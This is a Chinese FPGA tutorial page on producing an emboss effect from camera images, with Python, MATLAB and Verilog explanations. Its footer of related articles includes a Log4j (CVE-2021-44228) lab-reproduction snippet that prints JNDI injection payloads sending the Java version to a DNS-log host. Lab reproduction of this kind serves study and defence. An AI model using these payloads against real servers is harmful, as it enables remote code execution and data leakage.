PotatoPie 4.0 实验教程(32) —— FPGA实现摄像头图像浮雕效果

什么是浮雕效果?

浮雕效果是一种图像处理技术,用于将图像转换为看起来像浮雕一样的效果,给人一种凸起或凹陷的立体感觉,下面第二张图就是图像处理实现浮雕效果。

不过这个图是用Adobe公司的PS人工P图实现的,效果比较好,算法比我们在本教程讲述的要复杂很多,当然算法也没有公开。

图像的浮雕效果怎么实现?

图像的浮雕效果通常是通过以下步骤实现的:

  1. 转换为灰度图像:首先,将彩色图像转换为灰度图像。因为浮雕效果更适用于单通道的灰度图像,而且计算简单。

  2. 计算浮雕效果:对于每个像素,计算其与相邻像素的亮度差异。这个差异值越大,就越可能是立体感觉的边界。

  3. 映射到目标图像:根据计算的差异值,将图像中的每个像素替换为其灰度值加上一个固定的偏移量。通常,亮度差越大,偏移量就越大,从而产生浮雕效果。

  4. 调整浮雕强度:可以通过调整偏移量的大小来控制浮雕的强度。较大的偏移量将产生更加明显的浮雕效果,而较小的偏移量则会产生更加柔和的效果。

  5. 输出结果:最终得到的图像就是具有浮雕效果的图像,可以保存或者显示出来。

浮雕效果的实现方法有多种,但通常包括计算亮度差异、映射到目标图像和调整强度等步骤。

浮雕效果旨在突出图像中的变化部分,减弱相似部分,从而产生一种立体感。一般的处理流程如下:

  1. 差值计算:对于每个像素点,计算其左上角像素与右下角像素的亮度差值,然后加上一个固定的偏移值(通常为128)。这个过程突出了图像中的边缘和变化部分。

  2. 边界处理:对计算得到的差值进行边界处理,确保其范围在0到255之间。大于255的值被截断为255,小于0的值被截断为0。

  3. 像素替换:用处理后的差值替换原始图像中对应位置的像素值,产生浮雕效果。

python实现图像的浮点效果处理源码

PotatoPie 4.0 实验教程(32) —— FPGA实现摄像头图像浮雕效果-Anlogic-安路论坛-FPGA CPLD-ChipDebug

这段代码实现了将一张彩色图像转换为灰度图像,并对灰度图像进行浮雕效果的处理。具体功能如下:

  1. 读取名为”Lena.jpg”的彩色图像文件。
  2. 将彩色图像转换为灰度图像,以便后续处理。
  3. 计算浮雕效果图像,通过对每个像素点的领域像素进行差值计算,并添加一个偏置值(128),然后将结果限制在[0, 255]的范围内,得到浮雕效果图像。
  4. 显示原始灰度图像、浮雕效果图像以及另一个浮雕效果图像(在计算时采用不同的方法)。

函数功能说明:

  • cv2.imread(imagePath): 读取图像文件,返回图像的Numpy数组表示。
  • cv2.cvtColor(imageIn, cv2.COLOR_BGR2GRAY): 将彩色图像转换为灰度图像。
  • plt.imshow(image, cmap='gray'): 将图像显示在matplotlib窗口中,使用灰度色彩映射。
  • plt.title('title', fontproperties=font): 设置图像的标题,使用指定的字体。

上面这段代码中我们运用了两种方式计算浮雕效果:

  • 第一种:imageGray(i-1, j-1) - imageGray(i+1, j+1) + 128; 即像素点的左上角像素与右下角的像素做差值然后加上 128 
  • 第二种:imageGray(i, j+1) - imageGray(i, j) + 128; 采用一行像素中前后两个像素做差值然后加上128

下面是两种浮雕效果的示意图,可以看到第一种的效果要比第二种的效果好。

MATLAB实现图像的浮点效果处理源码

PotatoPie 4.0 实验教程(32) —— FPGA实现摄像头图像浮雕效果-Anlogic-安路论坛-FPGA CPLD-ChipDebug

这段 MATLAB 代码实现了对输入的彩色图像进行浮雕效果处理,并显示处理前后的图像。以下是代码的详细功能介绍:

  1. 清除工作空间:

    • 使用 clearclear all 和 clc 命令清除 MATLAB 工作空间中的所有变量、函数以及命令窗口的内容。
  2. 获取当前脚本所在目录:

    • 使用 mfilename 和 fileparts 函数获取当前 MATLAB 脚本所在的目录。
  3. 读取图像文件:

    • 使用 imread 函数读取名为 “Lena.jpg” 的图像文件,该文件位于脚本所在目录。
  4. 将图像转换为灰度图像:

    • 使用 rgb2gray 函数将彩色图像转换为灰度图像。
  5. 初始化浮雕效果图像矩阵:

    • 使用 zeros 函数初始化一个与灰度图像大小相同的全零矩阵,用于存储浮雕效果图像。
  6. 计算浮雕效果:

    • 使用嵌套的 for 循环遍历灰度图像的每个像素点。
    • 对于每个像素点,计算其浮雕像素值,即该像素与其左上角像素的灰度值差加上 128。
    • 通过限制像素值范围确保浮雕像素值在 0 到 255 之间。
    • 将计算得到的浮雕像素值赋给对应位置的浮雕效果图像矩阵。
  7. 显示图像:

    • 使用 subplot 和 imshow 函数在 MATLAB 中创建一个包含三个子图的图像窗口。
    • 第一个子图显示原始的灰度图像。
    • 第二个子图显示经过浮雕效果处理后的图像。
    • 第三个子图显示另一个经过浮雕效果处理后的图像。

通过这段代码,可以清楚地展示了原始图像和经过浮雕效果处理后的图像,帮助用户理解浮雕效果处理的效果和实现过程。

上面这段代码中我们运用了两种方式计算浮雕效果:

  • 第一种:imageGray(i-1, j-1) - imageGray(i+1, j+1) + 128; 即像素点的左上角像素与右下角的像素做差值然后加上 128 
  • 第二种:imageGray(i, j+1) - imageGray(i, j) + 128; 采用一行像素中前后两个像素做差值然后加上128

下面是两种浮雕效果的示意图,可以看到第一种的效果要比第二种的效果好。

FPGA工程分析

层次图

demo18相比,只是多了一个img_emboss的模块,也就是下面这一段代码,在从SDRAM读出来之后,经它处理后再输出hdmi_tx模块。

img_emboss u_img_emboss
(.i_clk(clk_pixel),.i_rst_n(sys_rst_n),.i_hs(VGA_HS),     .i_vs(VGA_VS),     .i_de  (VGA_DE),       .i_r(VGA_RGB[23:16]),.i_g(VGA_RGB[15:8] ),.i_b(VGA_RGB[7:0]  ),    .value(65),  .o_hs(emboss_hs),.o_vs(emboss_vs),.o_de(emboss_de),   .o_gray(emboss_data)
);

img_emboss模块源代码分析

前面讲过有两种实现浮雕效果的算法,为了简化运算和让教程更易懂,我们这个教程中先采用第二种算法。在后面会再开一篇讲解如何实现浮雕效果的第一种算法。

img_emboss核心代码总共有三步:

1、转灰度图,前面的课程中介绍过

r_d0 <= 77 * i_r;

g_d0 <= 150 * i_g;
b_d0 <= 29 * i_b;

2、浮雕计算,这里即为采用第二种方法,gray_d0[15:8]是当前像素的灰度值,gray_reg是前一像素的灰度值

assign emboss = gray_d0[15:8] - gray_reg + value; // 浮雕效果值计算

3.对计算出来的值进行防溢出处理,详见代码最后一段always;

管脚约束

与PotatoPie 4.0 实验教程(18) —— FPGA实现OV5640摄像头采集以SDRAM作为显存进行HDMI输出显示相同,不作赘述。

时序约束

与PotatoPie 4.0 实验教程(18) —— FPGA实现OV5640摄像头采集以SDRAM作为显存进行HDMI输出显示相同,不作赘述。

实验效果

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/831292.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

第一课 自动驾驶概述

1. contents 2. 什么是无人驾驶/自动驾驶 3 智慧出行大智慧 4. 无人驾驶的发展历程

Tracecat:开源 SOAR

Tracecat 是一个面向安全团队的开源自动化平台。 开发人员认为&#xff0c;每个人都应该可以使用安全自动化&#xff0c;特别是人手不足的中小型团队。 核心功能、用户界面和日常工作流程基于一流安全团队的现有最佳实践。 使用专门的人工智能模型来标记、总结和丰富警报。 …

Spark RDD的分区与依赖关系

Spark RDD的分区与依赖关系 RDD分区 RDD&#xff0c;Resiliennt Distributed Datasets&#xff0c;弹性式分布式数据集&#xff0c;是由若干个分区构成的&#xff0c;那么这每一个分区中的数据又是如何产生的呢&#xff1f;这就是RDD分区策略所要解决的问题&#xff0c;下面我…

<Linux> 权限

目录 权限人员相对于文件来说的分类更改权限文件的拥有者与所属组 权限 权限是操作系统用来限制对资源访问的机制&#xff0c;权限一般分为读、写、执行。系统中的每个文件都拥有特定的权限、所属用户及所属组&#xff0c;通过这样的机制来限制哪些用户、哪些组可以对特定文件…

VULHUB复现log4j反序列化漏洞-CVE-2021-44228

本地下载vulhub复现就完了&#xff0c;环境搭建不讲&#xff0c;网上其他文章很好。 访问该环境&#xff1a; POC 构造&#xff08;任选其一&#xff09;&#xff1a; ${jndi:ldap://${sys:java.version}.xxx.dnslog.cn} ${jndi:rmi://${sys:java.version}.xxx.dnslog.cn}我是…

双向链表专题

文章目录 目录1. 双向链表的结构2. 双向链表的实现3. 顺序表和双向链表的优缺点分析 目录 双向链表的结构双向链表的实现顺序表和双向链表的优缺点分析 1. 双向链表的结构 注意&#xff1a; 这⾥的“带头”跟前面我们说的“头节点”是两个概念&#xff0c;带头链表里的头节点…

C#描述-计算机视觉OpenCV(3):重映射

C#描述-计算机视觉OpenCV&#xff08;3&#xff09;&#xff1a;重映射 前言色彩波形图像重映射 前言 C#描述-计算机视觉OpenCV&#xff08;1&#xff09;&#xff1a;基础操作 C#描述-计算机视觉OpenCV&#xff08;2&#xff09;&#xff1a;图像处理 在前文中&#xff0c;描…

UI-Diffuser——使用生成性人工智能的UI原型设计

概述。 移动UI是影响参与度的一个重要因素&#xff0c;例如用户对应用的熟悉程度和使用的便利性。如果你有一个类似的应用程序&#xff0c;你可能会选择一个具有现代、好看的设计的应用程序&#xff0c;而不是一个旧的设计。然而&#xff0c;要从头开始研究什么样的UI最适合应…

Java中使用Redis实现分布式锁的三种方式

1. 导语 随着软件开发领域的不断演进,并发性已经成为一个至关重要的方面,特别是在资源跨多个进程共享的分布式系统中。 在Java中,管理并发性对于确保数据一致性和防止竞态条件至关重要。 Redis作为一个强大的内存数据存储,为在Java应用程序中实现分布式锁提供了一种高效的…

静态库、动态库回顾

回顾一下库相关的知识点&#xff0c;总结备忘一下。在某种情况下&#xff0c;你有了如下的代码&#xff0c;结构如下 //pra.h #include <stdio.h> void test_01(); //pra.c #include "pra.h" void test_01() {printf("xxxxxxx----->%s %s()\n",…

typescript类型检查和原始类型

typescript类型检查和原始类型 类型检查 非严格类型是typescript默认的类型检查模式&#xff0c;在该模式下&#xff0c;类型检查的规则相对轻松&#xff0c;不会对undefined和null值做过多的限制&#xff0c;允许将undefined和null值赋给string类型的变量。进行JavaScript代…

【ChatGPT with Date】使用 ChatGPT 时显示消息时间的插件

文章目录 1. 介绍2. 使用方法2.1 安装 Tampermonkey2.2 安装脚本2.3 使用 3. 配置3.1 时间格式3.2 时间位置 4. 反馈5. 未来计划6. 开源协议7. 供给开发者自定义修改脚本的文档7.1 项目组织架构7.2 定义新的 Component(1) 定义一个新的 Component 类(2) 注册该 Component 7.3 一…

ICode国际青少年编程竞赛- Python-1级训练场-基本操作

ICode国际青少年编程竞赛- Python-1级训练场-基本操作 1、 Dev.step(3)2、 Dev.step(1)3、 Dev.step(7)4、 Dev.step(-1)5、 Dev.step(-5)6、 Dev.step(3) Dev.step(-8)7、 Dev.turnRight() Dev.step(1)8、 Dev.turnLeft() Dev.step(1)9、 Dev.step(4) Dev.tur…

自动找出字符串中有符号数字

需求 代码 class Solution:def myAtoi(self, s: str) -> int:s s.strip() # 删除首尾空格if not s: return 0 # 字符串为空则直接返回res, i, sign 0, 1, 1int_max, int_min, bndry 2 ** 31 - 1, -2 ** 31, 2 ** 31 // 10if s[0…

2024年 Java 面试八股文——SpringMVC篇

目录 1.简单介绍下你对springMVC的理解? 2.说一说SpringMVC的重要组件及其作用 3.SpringMVC的工作原理或流程 4.SpringMVC的优点 5.SpringMVC常用注解 6.SpringMVC和struts2的区别 7.怎么实现SpringMVC拦截器 8.SpringMvc的控制器是不是单例模式&#xff1f;如果是&am…

B树:原理、操作及应用

B树&#xff1a;原理、操作及应用 一、引言二、B树概述1. 定义与性质2. B树与磁盘I/O 三、B树的基本操作1. 搜索&#xff08;B-TREE-SEARCH&#xff09;2. 插入&#xff08;B-TREE-INSERT&#xff09;3. 删除&#xff08;B-TREE-DELETE&#xff09; 四、B树的C代码实现示例五、…

蓝桥杯练习系统(算法训练)ALGO-953 混合积

资源限制 内存限制&#xff1a;256.0MB C/C时间限制&#xff1a;1.0s Java时间限制&#xff1a;3.0s Python时间限制&#xff1a;5.0s 问题描述 众所周知&#xff0c;人人都在学习线性代数&#xff0c;既然都学过&#xff0c;那么解决本题应该很方便。   宇宙大战中&…

如何在postman上提交文件格式的数据

如何在postman上提交文件格式的数据 今天在写一个文件上传的功能接口时&#xff0c;想用postman进行提交&#xff0c;花了些时间才找到在postman提交文件格式的数据。记录一下吧&#xff01; 1.打开postman&#xff0c;选择POST提交方式&#xff0c;然后在Params那一行的Head…

数据分析--客户价值分析RFM(K-means聚类/轮廓系数)

原数据 import os import pandas as pd import numpy as np import matplotlib.pyplot as plt import seaborn as sns from sklearn import metrics ### 数据抽取&#xff0c;读⼊数据 df pd.read_csv("customers1997.csv") #相对路径读取数据 print(df.info()) pr…

WPF之自定义绘图

1&#xff0c;创建自定义控件类 class CustomDrawnElement:FrameworkElement{public static readonly DependencyProperty BackgroundColorProperty;static CustomDrawnElement(){FrameworkPropertyMetadata meta new FrameworkPropertyMetadata(Colors.SkyBlue);meta.Affects…